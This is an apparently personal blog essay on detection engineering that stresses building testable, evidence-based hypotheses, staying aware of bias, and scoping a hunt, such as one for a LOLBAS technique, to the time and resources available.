What is Detection Engineering?
Let's use a fish analogy to unpack the struggle and nuance of Detection Engineering.
When beginning the journey of looking at your security program, its preventative security controls and the gaps that inherently reside in between our layered security approach - we may ask ourselves: “where do I even begin”…or, is that just me?
glances at the dictionary…
A hypothesis is a supposition or proposed explanation made on the basis of limited evidence as a starting point for further investigation.
To me, that means I should work on drafting a statement based upon initial observations or a limited understanding of something. What’s key here is that a good hypothesis should be stated in a way where there is a clear outcome that can be tested.
I want to further point out that the provided definition of a hypothesis specifically used the term evidence. Without evidence we’re working with bias, which is not the way to go. All I’m saying here is that it’s easy to look at an observation and draw a conclusion. Evidence and fact are what matter.
The fabrication of understanding beyond the scope of available evidence is a biased perception of reality.
Therein lies the whole point of a hypothesis. To create a supposition with the explicit understanding that we DO NOT know the whole truth.
The pursuit of truth is the scientific method which has made the hypothesis a tool for continual discovery, verification, and knowledge alignment. Egos need not apply.
While I understand that our education system has led us into valuing positive results over negative results - however, the whole point of a hypothesis is to evaluate if the supposition is either true or false. Both outcomes are good, one just requires a little more work…
True, and we’ve proven that the observation and our understanding of the cause/effect were correct. Before we start passing out high-fives, we should spend time evaluating the potential for the infusion of bias in our testing process. Our brains are engineered to make sense of and find answers - bias is a human condition that we must be aware of to combat.
False, and we’ve proven that we were incorrect. Dust yourself off and know that you’ve proven one method in which your hypothesis is not true. Apply the new knowledge, adjust, test, and repeat.
There are two possible outcomes: if the result confirms the hypothesis, then you’ve made a measurement. If the result is contrary to the hypothesis, then you’ve made a discovery. Enrico Fermi
I personally love to dig into interesting things and “follow rabbit holes” but this isn’t an efficient use of my time in systematically finding truths, closing knowledge gaps and hopefully solving problems.
When creating a hypothesis, we must consider the scope of what that hypothesis entails. We have to consider the realities of our time, resources, skill, knowledge, availability of tools and methods to test our hypothesis. We’re still proving Einstein’s theories correct in 2023. It can take a frustrating amount of time for the right elements to come together for a hypothesis to be tested.
If I were to suppose a threat actor is using a known LOLBAS technique across our estate of endpoints - what would shape the scope of this hypothesis?
None, some, maybe all of them? If given unlimited time and resources, what might we accomplish? Unfortunately, this isn’t realistic for nearly all of us. Something about an elephant and small bites is appropriate here.
I hear you, a lack of examples bothers me too, but for this one, I think you have to go it alone.
I firmly believe it’s the journey that provides the most value here. Yes, you may make a terrible hypothesis, but that pain of attempting to test a shitty hypothesis is the kind of real-world feedback needed to ultimately correct yourself and reinforce good habits.
Again, remember that we’re naturally injecting bias in our processes as we yearn to make sense of the things we don’t quickly understand. We need to go through the motions of evaluating, testing, and yes, being disappointed with the outcomes so that we can improve.
Attitude, disposition, and willingness to be okay with being wrong are key attributes to honing and applying the scientific method to the challenges you face.